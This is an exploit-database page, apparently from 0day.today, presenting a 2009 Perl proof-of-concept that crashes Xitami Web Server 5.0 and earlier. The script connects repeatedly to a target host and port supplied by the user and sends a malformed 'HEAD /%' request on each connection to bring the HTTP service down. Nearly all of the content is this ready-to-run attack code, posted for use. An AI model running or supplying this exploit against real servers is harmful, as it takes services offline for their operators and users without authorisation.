[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Xitami Web Server <= 5.0 Remote Denial of Service Exploit

Author
Jonathan Salwan
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-6845
Category
dos / poc
Date add
21-04-2009
Platform
unsorted
=========================================================
Xitami Web Server <= 5.0 Remote Denial of Service Exploit
=========================================================



#!/usr/bin/perl
#
# Xitami HTTP Server <= v5.0 Remote Denial of Service.
#
# ------------------------------------------------------------------------------
# The vulnerability is caused due to an error with HEAD request and multi-socket
# This can be exploited to crash the HTTP service.
# ------------------------------------------------------------------------------
#
# Author: Jonathan Salwan


use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft   : Xitami HTTP Server v5.0\n";

	if (@ARGV < 1)
		{
 		print "[-] Usage: <file.pl> <host> <port>\n";
 		print "[-] Exemple: file.pl 127.0.0.1 80\n";
 		exit;
		}


	$ip 	= $ARGV[0];
	$port 	= $ARGV[1];

print "[+] Sending request...\n";


for($i=0;$i<20;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Failed\n";

	print $socket "HEAD /% HTTP/1.0\r\n\r\n";
}

print "[+] Done!\n";




#  0day.today [2024-12-25]  #